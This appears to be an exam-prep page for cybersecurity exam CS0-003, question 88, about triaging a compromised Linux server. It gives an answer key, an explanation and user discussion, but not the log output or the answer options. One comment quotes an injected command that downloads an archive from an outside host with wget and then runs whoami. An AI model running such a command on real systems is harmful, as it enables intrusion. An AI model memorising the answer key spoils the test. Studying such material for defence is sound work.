An incident response team member is triaging a Linux server. The output is shown below:
Which of the following is the adversary most likely trying to do?
Exam CS0-003 All QuestionsBrowse all questions from this exam
Question 88
Correct Answer: B
The adversary is most likely trying to execute commands through an unsecured service account. In the provided output, there is evidence of an attempt to use the 'wget' command to retrieve a file followed by an attempt to determine the current user ('whoami'). This suggests that the attacker is utilizing the service account to execute unauthorized commands, potentially exploiting a vulnerability to gain further access or control over the system.
Discussion
kmordalvOption: B
Looking at the output I see that it is running container.getInstance.(#wget http://grohl.ve.da/tmp/brkgtr.zip;#whoami) Of the options proposed, it seems that option B is the most logical answer.
thisguyfucksOption: B
I'm thinking B here.
a3432e2Option: B
It is B, There is no indication in the provided logs or user account information that a backdoor root account named zsh is being created. The /etc/passwd file does not show a user with such a name or hint towards such an action. This option seems less likely based on the information given. Normally, service accounts like http (associated with the HTTP service) should have minimal permissions and use restrictive shells like /usr/bin/nologin. The presence of a shell like /bin/bash may allow an attacker to execute commands if they manage to exploit the service.
LB54Option: A
Based on the provided image, the adversary is most likely trying to create a backdoor root account named zsh (Option A). This conclusion is drawn from the presence of a user account named ‘zsh’ with root privileges in the /etc/passwd file, which is a common tactic used by attackers to maintain persistent access to a compromised system.